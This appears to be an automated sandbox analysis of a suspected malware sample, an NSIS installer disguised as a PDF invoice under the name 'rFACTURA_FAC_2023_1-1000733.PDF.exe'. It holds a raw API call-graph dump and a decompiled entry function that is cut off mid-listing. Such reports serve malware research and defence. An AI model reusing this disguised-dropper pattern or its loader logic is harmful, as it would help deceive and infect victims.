5656 10001731 5653->5656 5654->5649 5657 100015b4 3 API calls 5655->5657 5658 10001272 2 API calls 5656->5658 5659 10001714 5657->5659 5660 10001737 GlobalFree 5658->5660 5661 10001272 2 API calls 5659->5661 5660->5649 5662 1000174b GlobalFree 5660->5662 5663 1000171a GlobalFree 5661->5663 5662->5649 5663->5649 5302 401e77 5303 402c37 17 API calls 5302->5303 5304 401e7d 5303->5304 5305 402c37 17 API calls 5304->5305 5306 401e86 5305->5306 5307 402c37 17 API calls 5306->5307 5308 401e8f 5307->5308 5309 402c37 17 API calls 5308->5309 5310 401e98 5309->5310 5311 401423 24 API calls 5310->5311 5312 401e9f 5311->5312 5319 405887 ShellExecuteExW 5312->5319 5314 401ee1 5315 4066ea 5 API calls 5314->5315 5316 402885 5314->5316 5317 401efb CloseHandle 5315->5317 5317->5316 5319->5314 5320 10002238 5321 10002296 5320->5321 5323 100022cc 5320->5323 5322 100022a8 GlobalAlloc 5321->5322 5321->5323 5322->5321 5324 40167b 5325 402c37 17 API calls 5324->5325 5326 401682 5325->5326 5327 402c37 17 API calls 5326->5327 5328 40168b 5327->5328 5329 402c37 17 API calls 5328->5329 5330 401694 MoveFileW 5329->5330 5331 4016a7 5330->5331 5332 4016a0 5330->5332 5334 4065a2 2 API calls 5331->5334 5336 40224a 5331->5336 5333 401423 24 API calls 5332->5333 5333->5336 5335 4016b6 5334->5335 5335->5336 5337 406025 36 API calls 5335->5337 5337->5332 5338 40467c 5339 4046b2 5338->5339 5340 40468c 5338->5340 5342 40425b 8 API calls 5339->5342 5341 4041f4 18 API calls 5340->5341 5343 404699 SetDlgItemTextW 5341->5343 5344 4046be 5342->5344 5343->5339 5345 1000103d 5346 1000101b 5 API calls 5345->5346 5347 10001056 5346->5347 5216 40247e 5217 402c77 17 API calls 5216->5217 5218 402488 5217->5218 5219 402c37 17 API calls 5218->5219 5220 402491 5219->5220 5221 40249c RegQueryValueExW 5220->5221 5224 402885 5220->5224 5222 4024c2 RegCloseKey 5221->5222 5223 4024bc 5221->5223 5222->5224 5223->5222 5227 4061a6 wsprintfW 5223->5227 5227->5222 5664 4020fe 5665 402c37 17 API calls 5664->5665 5666 402105 
5665->5666 5667 402c37 17 API calls 5666->5667 5668 40210f 5667->5668 5669 402c37 17 API calls 5668->5669 5670 402119 5669->5670 5671 402c37 17 API calls 5670->5671 5672 402123 5671->5672 5673 402c37 17 API calls 5672->5673 5674 40212d 5673->5674 5675 40216c CoCreateInstance 5674->5675 5676 402c37 17 API calls 5674->5676 5679 40218b 5675->5679 5676->5675 5677 401423 24 API calls 5678 40224a 5677->5678 5679->5677 5679->5678 5836 4019ff 5837 402c37 17 API calls 5836->5837 5838 401a06 5837->5838 5839 402c37 17 API calls 5838->5839 5840 401a0f 5839->5840 5841 401a16 lstrcmpiW 5840->5841 5842 401a28 lstrcmpW 5840->5842 5843 401a1c 5841->5843 5842->5843 4169 401f00 4184 402c37 4169->4184 4176 401f39 CloseHandle 4179 402885 4176->4179 4180 401f2b 4181 401f30 4180->4181 4182 401f3b 4180->4182 4209 4061a6 wsprintfW 4181->4209 4182->4176 4185 402c43 4184->4185 4210 406281 4185->4210 4187 401f06 4190 4052c3 4187->4190 4191 4052de 4190->4191 4199 401f10 4190->4199 4192 4052fa lstrlenW 4191->4192 4193 406281 17 API calls 4191->4193 4194 405323 4192->4194 4195 405308 lstrlenW 4192->4195 4193->4192 4197 405336 4194->4197 4198 405329 SetWindowTextW 4194->4198 4196 40531a lstrcatW 4195->4196 4195->4199 4196->4194 4197->4199 4200 40533c SendMessageW SendMessageW SendMessageW 4197->4200 4198->4197 4201 405844 CreateProcessW 4199->4201 4200->4199 4202 401f16 4201->4202 4203 405877 CloseHandle 4201->4203 4202->4176 4202->4179 4204 4066ea WaitForSingleObject 4202->4204 4203->4202 4205 406704 4204->4205 4206 406716 GetExitCodeProcess 4205->4206 4252 406675 4205->4252 4206->4180 4209->4176 4211 40628e 4210->4211 4212 4064d9 4211->4212 4215 4064a7 lstrlenW 4211->4215 4217 406281 10 API calls 4211->4217 4220 4063bc GetSystemDirectoryW 4211->4220 4221 4063cf GetWindowsDirectoryW 4211->4221 4222 4064f3 5 API calls 4211->4222 4223 406281 10 API calls 4211->4223 4224 40644a lstrcatW 4211->4224 4225 406403 SHGetSpecialFolderLocation 4211->4225 4236 40612d 4211->4236 4241 4061a6 wsprintfW 
4211->4241 4242 40625f lstrcpynW 4211->4242 4213 402c64 4212->4213 4243 40625f lstrcpynW 4212->4243 4213->4187 4227 4064f3 4213->4227 4215->4211 4217->4215 4220->4211 4221->4211 4222->4211 4223->4211 4224->4211 4225->4211 4226 40641b SHGetPathFromIDListW CoTaskMemFree 4225->4226 4226->4211 4234 406500 4227->4234 4228 406576 4229 40657b CharPrevW 4228->4229 4231 40659c 4228->4231 4229->4228 4230 406569 CharNextW 4230->4228 4230->4234 4231->4187 4233 406555 CharNextW 4233->4234 4234->4228 4234->4230 4234->4233 4235 406564 CharNextW 4234->4235 4248 405b5d 4234->4248 4235->4230 4244 4060cc 4236->4244 4239 406161 RegQueryValueExW RegCloseKey 4240 406191 4239->4240 4240->4211 4241->4211 4242->4211 4243->4213 4245 4060db 4244->4245 4246 4060e4 RegOpenKeyExW 4245->4246 4247 4060df 4245->4247 4246->4247 4247->4239 4247->4240 4249 405b63 4248->4249 4250 405b79 4249->4250 4251 405b6a CharNextW 4249->4251 4250->4234 4251->4249 4253 406692 PeekMessageW 4252->4253 4254 4066a2 WaitForSingleObject 4253->4254 4255 406688 DispatchMessageW 4253->4255 4254->4205 4255->4253 5348 401000 5349 401037 BeginPaint GetClientRect 5348->5349 5350 40100c DefWindowProcW 5348->5350 5351 4010f3 5349->5351 5355 401179 5350->5355 5353 401073 CreateBrushIndirect FillRect DeleteObject 5351->5353 5354 4010fc 5351->5354 5353->5351 5356 401102 CreateFontIndirectW 5354->5356 5357 401167 EndPaint 5354->5357 5356->5357 5358 401112 6 API calls 5356->5358 5357->5355 5358->5357 4430 405402 4431 405423 GetDlgItem GetDlgItem GetDlgItem 4430->4431 4432 4055ac 4430->4432 4476 404229 SendMessageW 4431->4476 4434 4055b5 GetDlgItem CreateThread CloseHandle 4432->4434 4435 4055dd 4432->4435 4434->4435 4499 405396 OleInitialize 4434->4499 4437 405608 4435->4437 4440 4055f4 ShowWindow ShowWindow 4435->4440 4441 40562d 4435->4441 4436 405493 4445 40549a GetClientRect GetSystemMetrics SendMessageW SendMessageW 4436->4445 4438 405614 4437->4438 4439 405668 4437->4439 4442 405642 ShowWindow 4438->4442 4443 40561c 4438->4443 
4439->4441 4452 405676 SendMessageW 4439->4452 4481 404229 SendMessageW 4440->4481 4485 40425b 4441->4485 4448 405662 4442->4448 4449 405654 4442->4449 4482 4041cd 4443->4482 4450 405508 4445->4450 4451 4054ec SendMessageW SendMessageW 4445->4451 4454 4041cd SendMessageW 4448->4454 4453 4052c3 24 API calls 4449->4453 4455 40551b 4450->4455 4456 40550d SendMessageW 4450->4456 4451->4450 4457 40563b 4452->4457 4458 40568f CreatePopupMenu 4452->4458 4453->4448 4454->4439 4477 4041f4 4455->4477 4456->4455 4459 406281 17 API calls 4458->4459 4461 40569f AppendMenuW 4459->4461 4463 4056bc GetWindowRect 4461->4463 4464 4056cf TrackPopupMenu 4461->4464 4462 40552b 4465 405534 ShowWindow 4462->4465 4466 405568 GetDlgItem SendMessageW 4462->4466 4463->4464 4464->4457 4467 4056ea 4464->4467 4468 405557 4465->4468 4469 40554a ShowWindow 4465->4469 4466->4457 4470 40558f SendMessageW SendMessageW 4466->4470 4471 405706 SendMessageW 4467->4471 4480 404229 SendMessageW 4468->4480 4469->4468 4470->4457 4471->4471 4472 405723 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4471->4472 4474 405748 SendMessageW 4472->4474 4474->4474 4475 405771 GlobalUnlock SetClipboardData CloseClipboard 4474->4475 4475->4457 4476->4436 4478 406281 17 API calls 4477->4478 4479 4041ff SetDlgItemTextW 4478->4479 4479->4462 4480->4466 4481->4437 4483 4041d4 4482->4483 4484 4041da SendMessageW 4482->4484 4483->4484 4484->4441 4486 404273 GetWindowLongW 4485->4486 4496 4042fc 4485->4496 4487 404284 4486->4487 4486->4496 4488 404293 GetSysColor 4487->4488 4489 404296 4487->4489 4488->4489 4490 4042a6 SetBkMode 4489->4490 4491 40429c SetTextColor 4489->4491 4492 4042c4 4490->4492 4493 4042be GetSysColor 4490->4493 4491->4490 4494 4042d5 4492->4494 4495 4042cb SetBkColor 4492->4495 4493->4492 4494->4496 4497 4042e8 DeleteObject 4494->4497 4498 4042ef CreateBrushIndirect 4494->4498 4495->4494 4496->4457 4497->4498 4498->4496 4506 404240 4499->4506 4501 404240 SendMessageW 4503 4053f2 OleUninitialize 
4501->4503 4502 4053b9 4505 4053e0 4502->4505 4509 401389 4502->4509 4505->4501 4507 404258 4506->4507 4508 404249 SendMessageW 4506->4508 4507->4502 4508->4507 4511 401390 4509->4511 4510 4013fe 4510->4502 4511->4510 4512 4013cb MulDiv SendMessageW 4511->4512 4512->4511 4513 100027c2 4514 10002812 4513->4514 4515 100027d2 VirtualProtect 4513->4515 4515->4514 5795 401503 5796 40150b 5795->5796 5798 40151e 5795->5798 5797 402c15 17 API calls 5796->5797 5797->5798 5799 402306 5800 40230e 5799->5800 5803 402314 5799->5803 5801 402c37 17 API calls 5800->5801 5801->5803 5802 402322 5805 402330 5802->5805 5807 402c37 17 API calls 5802->5807 5803->5802 5804 402c37 17 API calls 5803->5804 5804->5802 5806 402c37 17 API calls 5805->5806 5808 402339 WritePrivateProfileStringW 5806->5808 5807->5805 5844 401f86 5845 402c37 17 API calls 5844->5845 5846 401f8d 5845->5846 5847 406639 5 API calls 5846->5847 5848 401f9c 5847->5848 5849 401fb8 GlobalAlloc 5848->5849 5850 402020 5848->5850 5849->5850 5851 401fcc 5849->5851 5852 406639 5 API calls 5851->5852 5853 401fd3 5852->5853 5854 406639 5 API calls 5853->5854 5855 401fdd 5854->5855 5855->5850 5859 4061a6 wsprintfW 5855->5859 5857 402012 5860 4061a6 wsprintfW 5857->5860 5859->5857 5860->5850 4555 402388 4556 402390 4555->4556 4557 4023bb 4555->4557 4567 402c77 4556->4567 4559 402c37 17 API calls 4557->4559 4561 4023c2 4559->4561 4572 402cf5 4561->4572 4562 4023a1 4564 402c37 17 API calls 4562->4564 4566 4023a8 RegDeleteValueW RegCloseKey 4564->4566 4565 4023cf 4566->4565 4568 402c37 17 API calls 4567->4568 4569 402c8e 4568->4569 4570 4060cc RegOpenKeyExW 4569->4570 4571 402397 4570->4571 4571->4562 4571->4565 4573 402d0b 4572->4573 4575 402d21 4573->4575 4576 402d2a 4573->4576 4575->4565 4577 4060cc RegOpenKeyExW 4576->4577 4581 402d58 4577->4581 4578 402d7e RegEnumKeyW 4579 402d95 RegCloseKey 4578->4579 4578->4581 4582 406639 5 API calls 4579->4582 4580 402db6 RegCloseKey 4586 402da9 4580->4586 4581->4578 4581->4579 4581->4580 
4583 402d2a 6 API calls 4581->4583 4581->4586 4584 402da5 4582->4584 4583->4581 4585 402dc4 RegDeleteKeyW 4584->4585 4584->4586 4585->4586 4586->4575 5809 404308 lstrcpynW lstrlenW 5810 40190c 5811 401943 5810->5811 5812 402c37 17 API calls 5811->5812 5813 401948 5812->5813 5814 40596d 67 API calls 5813->5814 5815 401951 5814->5815 5816 401d0e 5817 402c15 17 API calls 5816->5817 5818 401d15 5817->5818 5819 402c15 17 API calls 5818->5819 5820 401d21 GetDlgItem 5819->5820 5821 40258c 5820->5821 5359 1000164f 5360 10001516 GlobalFree 5359->5360 5362 10001667 5360->5362 5361 100016ad GlobalFree 5362->5361 5363 10001682 5362->5363 5364 10001699 VirtualFree 5362->5364 5363->5361 5364->5361 5822 40190f 5823 402c37 17 API calls 5822->5823 5824 401916 5823->5824 5825 4058c1 MessageBoxIndirectW 5824->5825 5826 40191f 5825->5826 5680 401491 5681 4052c3 24 API calls 5680->5681 5682 401498 5681->5682 5861 404391 5862 4043a9 5861->5862 5868 4044c3 5861->5868 5869 4041f4 18 API calls 5862->5869 5863 40452d 5864 4045f7 5863->5864 5865 404537 GetDlgItem 5863->5865 5870 40425b 8 API calls 5864->5870 5866 404551 5865->5866 5867 4045b8 5865->5867 5866->5867 5873 404577 SendMessageW LoadCursorW SetCursor 5866->5873 5867->5864 5874 4045ca 5867->5874 5868->5863 5868->5864 5871 4044fe GetDlgItem SendMessageW 5868->5871 5872 404410 5869->5872 5884 4045f2 5870->5884 5894 404216 KiUserCallbackDispatcher 5871->5894 5876 4041f4 18 API calls 5872->5876 5895 404640 5873->5895 5878 4045e0 5874->5878 5879 4045d0 SendMessageW 5874->5879 5881 40441d CheckDlgButton 5876->5881 5878->5884 5885 4045e6 SendMessageW 5878->5885 5879->5878 5880 404528 5886 40461c SendMessageW 5880->5886 5892 404216 KiUserCallbackDispatcher 5881->5892 5885->5884 5886->5863 5887 40443b GetDlgItem 5893 404229 SendMessageW 5887->5893 5889 404451 SendMessageW 5890 404477 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5889->5890 5891 40446e GetSysColor 5889->5891 5890->5884 5891->5890 5892->5887 5893->5889 
5894->5880 5898 405887 ShellExecuteExW 5895->5898 5897 4045a6 LoadCursorW SetCursor 5897->5867 5898->5897 5899 402592 5900 4025c1 5899->5900 5901 4025a6 5899->5901 5903 4025f5 5900->5903 5904 4025c6 5900->5904 5902 402c15 17 API calls 5901->5902 5911 4025ad 5902->5911 5905 402c37 17 API calls 5903->5905 5906 402c37 17 API calls 5904->5906 5907 4025fc lstrlenW 5905->5907 5908 4025cd WideCharToMultiByte lstrlenA 5906->5908 5907->5911 5908->5911 5909 40263f 5910 402629 5910->5909 5912 405e03 WriteFile 5910->5912 5911->5909 5911->5910 5913 405e32 5 API calls 5911->5913 5912->5909 5913->5910 5365 10001058 5367 10001074 5365->5367 5366 100010dd 5367->5366 5368 10001092 5367->5368 5369 10001516 GlobalFree 5367->5369 5370 10001516 GlobalFree 5368->5370 5369->5368 5371 100010a2 5370->5371 5372 100010b2 5371->5372 5373 100010a9 GlobalSize 5371->5373 5374 100010b6 GlobalAlloc 5372->5374 5375 100010c7 5372->5375 5373->5372 5376 1000153d 3 API calls 5374->5376 5377 100010d2 GlobalFree 5375->5377 5376->5375 5377->5366 5378 401c19 5379 402c15 17 API calls 5378->5379 5380 401c20 5379->5380 5381 402c15 17 API calls 5380->5381 5382 401c2d 5381->5382 5383 401c42 5382->5383 5384 402c37 17 API calls 5382->5384 5385 401c52 5383->5385 5386 402c37 17 API calls 5383->5386 5384->5383 5387 401ca9 5385->5387 5388 401c5d 5385->5388 5386->5385 5389 402c37 17 API calls 5387->5389 5390 402c15 17 API calls 5388->5390 5391 401cae 5389->5391 5392 401c62 5390->5392 5394 402c37 17 API calls 5391->5394 5393 402c15 17 API calls 5392->5393 5395 401c6e 5393->5395 5396 401cb7 FindWindowExW 5394->5396 5397 401c99 SendMessageW 5395->5397 5398 401c7b SendMessageTimeoutW 5395->5398 5399 401cd9 5396->5399 5397->5399 5398->5399 5400 404a19 5401 404a45 5400->5401 5402 404a29 5400->5402 5403 404a78 5401->5403 5404 404a4b SHGetPathFromIDListW 5401->5404 5411 4058a5 GetDlgItemTextW 5402->5411 5407 404a62 SendMessageW 5404->5407 5408 404a5b 5404->5408 5406 404a36 SendMessageW 5406->5401 5407->5403 5409 40140b 2 API 
calls 5408->5409 5409->5407 5411->5406 5683 402a9a SendMessageW 5684 402ab4 InvalidateRect 5683->5684 5685 402abf 5683->5685 5684->5685 5136 403d1b 5137 403d33 5136->5137 5138 403e6e 5136->5138 5137->5138 5139 403d3f 5137->5139 5140 403ebf 5138->5140 5141 403e7f GetDlgItem GetDlgItem 5138->5141 5142 403d4a SetWindowPos 5139->5142 5143 403d5d 5139->5143 5145 403f19 5140->5145 5154 401389 2 API calls 5140->5154 5144 4041f4 18 API calls 5141->5144 5142->5143 5147 403d62 ShowWindow 5143->5147 5148 403d7a 5143->5148 5149 403ea9 SetClassLongW 5144->5149 5146 404240 SendMessageW 5145->5146 5150 403e69 5145->5150 5176 403f2b 5146->5176 5147->5148 5151 403d82 DestroyWindow 5148->5151 5152 403d9c 5148->5152 5153 40140b 2 API calls 5149->5153 5206 40417d 5151->5206 5155 403da1 SetWindowLongW 5152->5155 5156 403db2 5152->5156 5153->5140 5157 403ef1 5154->5157 5155->5150 5160 403e5b 5156->5160 5161 403dbe GetDlgItem 5156->5161 5157->5145 5162 403ef5 SendMessageW 5157->5162 5158 40140b 2 API calls 5158->5176 5159 40417f DestroyWindow EndDialog 5159->5206 5163 40425b 8 API calls 5160->5163 5165 403dd1 SendMessageW IsWindowEnabled 5161->5165 5166 403dee 5161->5166 5162->5150 5163->5150 5164 4041ae ShowWindow 5164->5150 5165->5150 5165->5166 5168 403dfb 5166->5168 5169 403e42 SendMessageW 5166->5169 5170 403e0e 5166->5170 5179 403df3 5166->5179 5167 406281 17 API calls 5167->5176 5168->5169 5168->5179 5169->5160 5173 403e16 5170->5173 5174 403e2b 5170->5174 5171 4041cd SendMessageW 5175 403e29 5171->5175 5172 4041f4 18 API calls 5172->5176 5177 40140b 2 API calls 5173->5177 5178 40140b 2 API calls 5174->5178 5175->5160 5176->5150 5176->5158 5176->5159 5176->5167 5176->5172 5181 4041f4 18 API calls 5176->5181 5197 4040bf DestroyWindow 5176->5197 5177->5179 5180 403e32 5178->5180 5179->5171 5180->5160 5180->5179 5182 403fa6 GetDlgItem 5181->5182 5183 403fc3 ShowWindow KiUserCallbackDispatcher 5182->5183 5184 403fbb 5182->5184 5207 404216 KiUserCallbackDispatcher 5183->5207 5184->5183 
5186 403fed EnableWindow 5191 404001 5186->5191 5187 404006 GetSystemMenu EnableMenuItem SendMessageW 5188 404036 SendMessageW 5187->5188 5187->5191 5188->5191 5190 403cfc 18 API calls 5190->5191 5191->5187 5191->5190 5208 404229 SendMessageW 5191->5208 5209 40625f lstrcpynW 5191->5209 5193 404065 lstrlenW 5194 406281 17 API calls 5193->5194 5195 40407b SetWindowTextW 5194->5195 5196 401389 2 API calls 5195->5196 5196->5176 5198 4040d9 CreateDialogParamW 5197->5198 5197->5206 5199 40410c 5198->5199 5198->5206 5200 4041f4 18 API calls 5199->5200 5201 404117 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5200->5201 5202 401389 2 API calls 5201->5202 5203 40415d 5202->5203 5203->5150 5204 404165 ShowWindow 5203->5204 5205 404240 SendMessageW 5204->5205 5205->5206 5206->5150 5206->5164 5207->5186 5208->5191 5209->5193 5412 40281b 5413 402821 5412->5413 5414 402829 FindClose 5413->5414 5415 402abf 5413->5415 5414->5415 5686 40149e 5687 4022f1 5686->5687 5688 4014ac PostQuitMessage 5686->5688 5688->5687 5689 100010e1 5690 10001111 5689->5690 5691 100011d8 GlobalFree 5690->5691 5692 100012ba 2 API calls 5690->5692 5693 100011d3 5690->5693 5694 100011f8 GlobalFree 5690->5694 5695 10001272 2 API calls 5690->5695 5696 10001164 GlobalAlloc 5690->5696 5697 100012e1 lstrcpyW 5690->5697 5698 100011c4 GlobalFree 5690->5698 5692->5690 5693->5691 5694->5690 5695->5698 5696->5690 5697->5690 5698->5690 5914 4029a2 5915 402c15 17 API calls 5914->5915 5916 4029a8 5915->5916 5917 4029e8 5916->5917 5918 4029cf 5916->5918 5919 402885 5916->5919 5922 402a02 5917->5922 5923 4029f2 5917->5923 5920 4029d4 5918->5920 5921 4029e5 5918->5921 5928 40625f lstrcpynW 5920->5928 5929 4061a6 wsprintfW 5921->5929 5925 406281 17 API calls 5922->5925 5924 402c15 17 API calls 5923->5924 5924->5919 5925->5919 5928->5919 5929->5919 4527 4015a3 4528 402c37 17 API calls 4527->4528 4529 4015aa SetFileAttributesW 4528->4529 4530 4015bc 4529->4530 5699 4028a7 5700 402c37 17 API calls 5699->5700 5701 4028b5 
5700->5701 5702 4028cb 5701->5702 5703 402c37 17 API calls 5701->5703 5704 405d2c 2 API calls 5702->5704 5703->5702 5705 4028d1 5704->5705 5727 405d51 GetFileAttributesW CreateFileW 5705->5727 5707 4028de 5708 402981 5707->5708 5709 4028ea GlobalAlloc 5707->5709 5712 402989 DeleteFileW 5708->5712 5713 40299c 5708->5713 5710 402903 5709->5710 5711 402978 CloseHandle 5709->5711 5728 403308 SetFilePointer 5710->5728 5711->5708 5712->5713 5715 402909 5716 4032f2 ReadFile 5715->5716 5717 402912 GlobalAlloc 5716->5717 5718 402922 5717->5718 5719 402956 5717->5719 5721 4030fa 31 API calls 5718->5721 5720 405e03 WriteFile 5719->5720 5722 402962 GlobalFree 5720->5722 5726 40292f 5721->5726 5723 4030fa 31 API calls 5722->5723 5724 402975 5723->5724 5724->5711 5725 40294d GlobalFree 5725->5719 5726->5725 5727->5707 5728->5715 5827 40392b 5828 403936 5827->5828 5829 40393a 5828->5829 5830 40393d GlobalAlloc 5828->5830 5830->5829 4599 40202c 4600 4020f0 4599->4600 4601 40203e 4599->4601 4603 401423 24 API calls 4600->4603 4602 402c37 17 API calls 4601->4602 4604 402045 4602->4604 4609 40224a 4603->4609 4605 402c37 17 API calls 4604->4605 4606 40204e 4605->4606 4607 402064 LoadLibraryExW 4606->4607 4608 402056 GetModuleHandleW 4606->4608 4607->4600 4610 402075 4607->4610 4608->4607 4608->4610 4622 4066a8 WideCharToMultiByte 4610->4622 4613 402086 4615 4020a5 4613->4615 4616 40208e 4613->4616 4614 4020bf 4617 4052c3 24 API calls 4614->4617 4625 10001759 4615->4625 4618 401423 24 API calls 4616->4618 4619 402096 4617->4619 4618->4619 4619->4609 4620 4020e2 FreeLibrary 4619->4620 4620->4609 4623 4066d2 GetProcAddress 4622->4623 4624 402080 4622->4624 4623->4624 4624->4613 4624->4614 4626 10001789 4625->4626 4667 10001b18 4626->4667 4628 10001790 4629 100018a6 4628->4629 4630 100017a1 4628->4630 4631 100017a8 4628->4631 4629->4619 4715 10002286 4630->4715 4699 100022d0 4631->4699 4636 100017cd 4637 1000180c 4636->4637 4638 100017ee 4636->4638 4643 10001812 4637->4643 4644 1000184e 
4637->4644 4728 100024a4 4638->4728 4639 100017d7 4639->4636 4725 10002b57 4639->4725 4640 100017be 4642 100017c4 4640->4642 4648 100017cf 4640->4648 4642->4636 4709 1000289c 4642->4709 4650 100015b4 3 API calls 4643->4650 4646 100024a4 10 API calls 4644->4646 4655 10001840 4646->4655 4647 100017f4 4739 100015b4 4647->4739 4719 10002640 4648->4719 4653 10001828 4650->4653 4654 100024a4 10 API calls 4653->4654 4654->4655 4658 10001895 4655->4658 4750 10002467 4655->4750 4657 100017d5 4657->4636 4658->4629 4660 1000189f GlobalFree 4658->4660 4660->4629 4664 10001881 4664->4658 4754 1000153d wsprintfW 4664->4754 4665 1000187a FreeLibrary 4665->4664 4757 1000121b GlobalAlloc 4667->4757 4669 10001b3c 4758 1000121b GlobalAlloc 4669->4758 4671 10001d7a GlobalFree GlobalFree GlobalFree 4672 10001d97 4671->4672 4682 10001de1 4671->4682 4673 100020ee 4672->4673 4672->4682 4683 10001dac 4672->4683 4675 10002110 GetModuleHandleW 4673->4675 4673->4682 4674 10001c1d GlobalAlloc 4686 10001b47 4674->4686 4677 10002121 LoadLibraryW 4675->4677 4678 10002136 4675->4678 4676 10001c86 GlobalFree 4676->4686 4677->4678 4677->4682 4765 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4678->4765 4679 10001c68 lstrcpyW 4680 10001c72 lstrcpyW 4679->4680 4680->4686 4682->4628 4683->4682 4761 1000122c 4683->4761 4684 10002188 4684->4682 4688 10002195 lstrlenW 4684->4688 4686->4671 4686->4674 4686->4676 4686->4679 4686->4680 4686->4682 4689 10002048 4686->4689 4693 10001f37 GlobalFree 4686->4693 4694 1000122c 2 API calls 4686->4694 4697 10001cc4 4686->4697 4764 1000121b GlobalAlloc 4686->4764 4687 10002148 4687->4684 4698 10002172 GetProcAddress 4687->4698 4766 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4688->4766 4689->4682 4692 10002090 lstrcpyW 4689->4692 4692->4682 4693->4686 4694->4686 4695 100021af 4695->4682 4697->4686 4759 1000158f GlobalSize GlobalAlloc 4697->4759 4698->4684 4701 100022e8 4699->4701 4700 

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                  C-Code - Quality: 81%
                                                                                                  			_entry_() {
                                                                                                  				signed int _t51;
                                                                                                  				intOrPtr* _t56;
                                                                                                  				WCHAR* _t60;
                                                                                                  				char* _t63;
                                                                                                  				void* _t66;
                                                                                                  				void* _t68;
                                                                                                  				int _t70;
                                                                                                  				int _t72;
                                                                                                  				int _t75;
                                                                                                  				intOrPtr* _t76;
                                                                                                  				int _t77;
                                                                                                  				int _t79;
                                                                                                  				void* _t103;
                                                                                                  				signed int _t120;
                                                                                                  				void* _t123;
                                                                                                  				void* _t128;
                                                                                                  				intOrPtr _t147;
                                                                                                  				intOrPtr _t148;
                                                                                                  				intOrPtr* _t149;
                                                                                                  				int _t151;
                                                                                                  				void* _t154;
                                                                                                  				int _t155;
                                                                                                  				signed int _t159;
                                                                                                  				signed int _t164;
                                                                                                  				signed int _t169;
                                                                                                  				void* _t171;
                                                                                                  				WCHAR* _t172;
                                                                                                  				signed int _t175;
                                                                                                  				signed int _t178;
                                                                                                  				CHAR* _t179;
                                                                                                  				void* _t182;
                                                                                                  				int* _t184;
                                                                                                  				void* _t192;
                                                                                                  				char* _t193;
                                                                                                  				void* _t196;
                                                                                                  				void* _t197;
                                                                                                  				void* _t243;
                                                                                                  
                                                                                                  				_t171 = 0x20;
                                                                                                  				_t151 = 0;
                                                                                                  				 *(_t197 + 0x14) = 0;
                                                                                                  				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                  				 *(_t197 + 0x1c) = 0;
                                                                                                  				SetErrorMode(0x8001); // executed
                                                                                                  				_t51 = GetVersion() & 0xbfffffff;
                                                                                                  				 *0x7a8a2c = _t51;
                                                                                                  				if(_t51 != 6) {
                                                                                                  					_t149 = E00406639(0);
                                                                                                  					if(_t149 != 0) {
                                                                                                  						 *_t149(0xc00);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t179 = "UXTHEME";
                                                                                                  				goto L4;
                                                                                                  				L8:
                                                                                                  				__imp__#17(_t192);
                                                                                                  				__imp__OleInitialize(_t151); // executed
                                                                                                  				 *0x7a8af8 = _t56;
                                                                                                  				SHGetFileInfoW(0x79fee0, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
                                                                                                  				E0040625F("Tophyperidrosis Setup", L"NSIS Error");
                                                                                                  				_t60 = GetCommandLineW();
                                                                                                  				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe\"";
                                                                                                  				E0040625F(_t193, _t60);
                                                                                                  				 *0x7a8a20 = GetModuleHandleW(_t151);
                                                                                                  				_t63 = _t193;
                                                                                                  				if(L"\"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe\"" == 0x22) {
                                                                                                  					_t63 =  &M007B3002;
                                                                                                  					_t171 = 0x22;
                                                                                                  				}
                                                                                                  				_t155 = CharNextW(E00405B5D(_t63, _t171));
                                                                                                  				 *(_t197 + 0x18) = _t155;
                                                                                                  				_t66 =  *_t155;
                                                                                                  				if(_t66 == _t151) {
                                                                                                  					L33:
                                                                                                  					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                                  					GetTempPathW(0x400, _t172);
                                                                                                  					_t68 = E0040331F(_t155, 0);
                                                                                                  					_t225 = _t68;
                                                                                                  					if(_t68 != 0) {
                                                                                                  						L36:
                                                                                                  						DeleteFileW(L"1033"); // executed
                                                                                                  						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
                                                                                                  						 *(_t197 + 0x10) = _t70;
                                                                                                  						if(_t70 != _t151) {
                                                                                                  							L48:
                                                                                                  							E00403893();
                                                                                                  							__imp__OleUninitialize();
                                                                                                  							_t239 =  *(_t197 + 0x10) - _t151;
                                                                                                  							if( *(_t197 + 0x10) == _t151) {
                                                                                                  								__eflags =  *0x7a8ad4 - _t151;
                                                                                                  								if( *0x7a8ad4 == _t151) {
                                                                                                  									L72:
                                                                                                  									_t72 =  *0x7a8aec;
                                                                                                  									__eflags = _t72 - 0xffffffff;
                                                                                                  									if(_t72 != 0xffffffff) {
                                                                                                  										 *(_t197 + 0x10) = _t72;
                                                                                                  									}
                                                                                                  									ExitProcess( *(_t197 + 0x10));
                                                                                                  								}
                                                                                                  								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
                                                                                                  								__eflags = _t75;
                                                                                                  								if(_t75 != 0) {
                                                                                                  									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
                                                                                                  									 *(_t197 + 0x34) = 1;
                                                                                                  									 *(_t197 + 0x40) = 2;
                                                                                                  									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
                                                                                                  								}
                                                                                                  								_t76 = E00406639("true");
                                                                                                  								__eflags = _t76 - _t151;
                                                                                                  								if(_t76 == _t151) {
                                                                                                  									L70:
                                                                                                  									_t77 = ExitWindowsEx(2, 0x80040002);
                                                                                                  									__eflags = _t77;
                                                                                                  									if(_t77 != 0) {
                                                                                                  										goto L72;
                                                                                                  									}
                                                                                                  									goto L71;
                                                                                                  								} else {
                                                                                                  									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
                                                                                                  									__eflags = _t79;
                                                                                                  									if(_t79 == 0) {
